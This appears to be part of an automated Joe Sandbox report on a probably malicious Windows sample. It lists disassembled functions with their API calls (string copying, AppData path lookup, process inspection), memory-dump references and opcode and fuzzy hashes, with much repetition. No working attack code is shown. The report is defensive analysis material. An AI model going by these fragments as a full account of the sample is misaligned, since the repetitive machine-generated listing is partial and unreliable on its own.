                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: strlen
                                • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                • API String ID: 39653677-4138519520
                                • Opcode ID: 550a7c58928e28eb344b2189979e9cf4ee1ef3f30e1d7bea0f2d1139b4605c2b
                                • Instruction ID: aa8c0e979b29ff5ec07a168bfe2d21bf502e489149f8f756074c29817e89aeff
                                • Opcode Fuzzy Hash: 550a7c58928e28eb344b2189979e9cf4ee1ef3f30e1d7bea0f2d1139b4605c2b
                                • Instruction Fuzzy Hash: 6E2128355223CA8BD720EA36C8A46EDF36BEF80361F844156C8190B7C1E336194AD796
                                Function 006DEB70 Relevance: 6.1, APIs: 4, Instructions: 90stringCOMMON
                                Download Yara Rule
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006DEBB4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DEBE3
                                • lstrcat.KERNEL32(?,00000000), ref: 006DEBF1
                                • lstrcat.KERNEL32(?,00F20490), ref: 006DEC0C
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: bb108bc305616d4da9a697e2d9aa27276ac9de37de0b38114dd2a543ccda831d
                                • Instruction ID: beff73143fc179b4d1462a2a3aae83748a5bea89cc976891f3d2349361279c5f
                                • Opcode Fuzzy Hash: bb108bc305616d4da9a697e2d9aa27276ac9de37de0b38114dd2a543ccda831d
                                • Instruction Fuzzy Hash: E53160B1A10119ABCB61EBB5DC55FFD77B9FF48300F1004ADBA0A9B241DE70AE448B94
                                Function 006E4480 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                                Download Yara Rule
                                APIs
                                • OpenProcess.KERNEL32(00000410,00000000), ref: 006E4492
                                • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 006E44AD
                                • CloseHandle.KERNEL32(00000000), ref: 006E44B4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006E44E7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                                • String ID:
                                • API String ID: 4028989146-0
                                • Opcode ID: 2128367cc97818d8e7fd4be57fdc89ff50ae0d0b82f95986045151b57cd70dad
                                • Instruction ID: b08cc54ee997d7b65f6d365637d72c12e3ee4e1ccf48fe5f9771758d53de83bf
                                • Opcode Fuzzy Hash: 2128367cc97818d8e7fd4be57fdc89ff50ae0d0b82f95986045151b57cd70dad
                                • Instruction Fuzzy Hash: C1F0C8B09027556BE721AB759C49FFA76E9FB54304F0005A5EA89D72C0DEB48884CB90
                                Function 006E8FD1 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __getptd.LIBCMT ref: 006E8FDD
                                  • Part of subcall function 006E87FF: __amsg_exit.LIBCMT ref: 006E880F
                                • __getptd.LIBCMT ref: 006E8FF4
                                • __amsg_exit.LIBCMT ref: 006E9002
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 006E9026
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: c36cf916b753456198ff487efc74eb7d175b6d0116ac778cd66759b7f60c92d9
                                • Instruction ID: 9da9a9c771fea4c494994770f2ad811be4ed553e8adf2f9c03ef3e49dbbd565b
                                • Opcode Fuzzy Hash: c36cf916b753456198ff487efc74eb7d175b6d0116ac778cd66759b7f60c92d9
                                • Instruction Fuzzy Hash: 82F0F63290B7908BDBA0BB7B580675D33A36F10710F24011DF008672D2DF641900D66D
                                Function 006E7310 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(------,006C5BEB), ref: 006E731B
                                • lstrcpy.KERNEL32(00000000), ref: 006E733F
                                • lstrcat.KERNEL32(?,------), ref: 006E7349
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcatlstrcpylstrlen
                                • String ID: ------
                                • API String ID: 3050337572-882505780
                                • Opcode ID: 41a5c121786c4f42cc4725dda4effb1eeeca8a7529ad981b3689c01957574bbe
                                • Instruction ID: 38aa4bc6f63d8b3c79fa465a0ff519eb49551db8c53b9878a496ab4d44120a00
                                • Opcode Fuzzy Hash: 41a5c121786c4f42cc4725dda4effb1eeeca8a7529ad981b3689c01957574bbe
                                • Instruction Fuzzy Hash: 9AF0C9785117429FDB649F36D848E26BAFAFF84701318882DACDAC7314EB34D841DB10
                                Function 006D33D0 Relevance: 5.5, APIs: 4, Instructions: 486stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C1557
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C1579
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C159B
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C15FF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D3422
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D344B
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D3471
                                • lstrcpy.KERNEL32(00000000,?), ref: 006D3497
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: e91b3958852f5f8686b6a8bd3e3d0e708d6c268e9c73d1bdfaaf659769e6e1e9
                                • Instruction ID: 5c3dc3a0f112c4e9421f6da58e8af900e6292b8cb9241590ef31dd07a3680d75
                                • Opcode Fuzzy Hash: e91b3958852f5f8686b6a8bd3e3d0e708d6c268e9c73d1bdfaaf659769e6e1e9
                                • Instruction Fuzzy Hash: 1612FA70E012218FDB28CF29D554BA5B7E6BF44318B19C0AEE809DB3A2D776DD42CB45
                                Function 006D7C20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 006D7C94
                                • std::_Xinvalid_argument.LIBCPMT ref: 006D7CAF
                                  • Part of subcall function 006D7D40: std::_Xinvalid_argument.LIBCPMT ref: 006D7D58
                                  • Part of subcall function 006D7D40: std::_Xinvalid_argument.LIBCPMT ref: 006D7D76
                                  • Part of subcall function 006D7D40: std::_Xinvalid_argument.LIBCPMT ref: 006D7D91
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_
                                • String ID: string too long
                                • API String ID: 909987262-2556327735
                                • Opcode ID: 6c86b11640f4871e82730e736893624e318363f81c51de067453da32c1f7a760
                                • Instruction ID: 7f58cc860a37cf9317dbf428833c568020feef908ceb671a109c59cab0bd99c2
                                • Opcode Fuzzy Hash: 6c86b11640f4871e82730e736893624e318363f81c51de067453da32c1f7a760
                                • Instruction Fuzzy Hash: C73106727182148FD734DE6CE88096AF3EBEF95760B20462FF5418B741E7719C4183AA
                                Function 006C6EF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,?), ref: 006C6F74
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006C6F7B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcess
                                • String ID: @
                                • API String ID: 1357844191-2766056989
                                • Opcode ID: dad14d2852598392fdc172ea70fc293ca0fd17270bc7647de13533041220f1cb
                                • Instruction ID: b31005c20d59a6ef3467e94b41f15ca3e7306a2519738e3d0a7b8bcb3b0e6a0c
                                • Opcode Fuzzy Hash: dad14d2852598392fdc172ea70fc293ca0fd17270bc7647de13533041220f1cb
                                • Instruction Fuzzy Hash: 35218CB06006019BEB209F20DC84FB673EAEB80705F44487CF996CBA84FB75E945CB54
                                Function 006E2400 Relevance: 5.2, APIs: 4, Instructions: 234stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006E244C
                                • lstrlen.KERNEL32(00000000), ref: 006E24E9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E2570
                                • lstrlen.KERNEL32(00000000), ref: 006E2577
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: fe837f4e58cd187e97adc53b948d4b761aa3ad719484f7e6d81d9155ec93cf34
                                • Instruction ID: 2c77bf2b07293638e46a7e3760e97bf2ebc870b985da2022572ea875abd67e41
                                • Opcode Fuzzy Hash: fe837f4e58cd187e97adc53b948d4b761aa3ad719484f7e6d81d9155ec93cf34
                                • Instruction Fuzzy Hash: 0481D1B0E013469BDB14CF96D854BAEB7BBFF84300F18806DE508A7381EB759946CB94
                                Function 006E1570 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 006E15A1
                                • lstrcpy.KERNEL32(00000000,?), ref: 006E15D9
                                • lstrcpy.KERNEL32(00000000,?), ref: 006E1611
                                • lstrcpy.KERNEL32(00000000,?), ref: 006E1649
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 33b6b4456abe4eb46a20b4cc025c439746e378e197851f547a45b433986e4f1f
                                • Instruction ID: 080ded590667b9a2c26b7b919fa72cda9f15c537034715b16053496d5e93ab7e
                                • Opcode Fuzzy Hash: 33b6b4456abe4eb46a20b4cc025c439746e378e197851f547a45b433986e4f1f
                                • Instruction Fuzzy Hash: F321D8B4612B429BD7249F6BD458F67B7E6FF85700B04491CA89ACBB40DB34E841CBA0
                                Function 006C1530 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 006C1610: lstrcpy.KERNEL32(00000000), ref: 006C162D
                                  • Part of subcall function 006C1610: lstrcpy.KERNEL32(00000000,?), ref: 006C164F
                                  • Part of subcall function 006C1610: lstrcpy.KERNEL32(00000000,?), ref: 006C1671
                                  • Part of subcall function 006C1610: lstrcpy.KERNEL32(00000000,?), ref: 006C1693
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C1557
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C1579
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C159B
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C15FF
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
